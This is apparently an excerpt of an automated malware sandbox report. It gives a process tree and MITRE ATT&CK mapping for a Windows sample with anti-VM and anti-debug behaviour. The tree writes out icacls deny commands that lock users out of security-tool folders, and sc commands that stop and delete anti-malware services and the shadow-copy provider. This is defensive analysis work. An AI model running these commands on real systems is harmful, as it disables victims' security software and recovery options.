      4⤵
      PID:5580
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6544
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6656
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6024
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5752
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6524
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5492
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
      4⤵
      PID:6048
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
        5⤵
        Modifies file permissions
        
        PID:5188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
      4⤵
      PID:3588
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5716
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
        5⤵
        Modifies file permissions
        
        PID:6020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
      4⤵
      PID:3884
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
        5⤵
        Modifies file permissions
        
        PID:6044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:5340
    - - C:\Windows\system32\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        
        PID:6332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:5468
    - - C:\Windows\system32\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:5792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:1760
    - - C:\Windows\system32\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:948
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1648
    - - C:\Windows\system32\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:6196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:5688
    - - C:\Windows\system32\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        
        PID:6984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:7116
    - - C:\Windows\system32\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:5180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
      4⤵
      PID:7088
    - - C:\Windows\system32\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:6560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5372

C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7040

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

System Information Discovery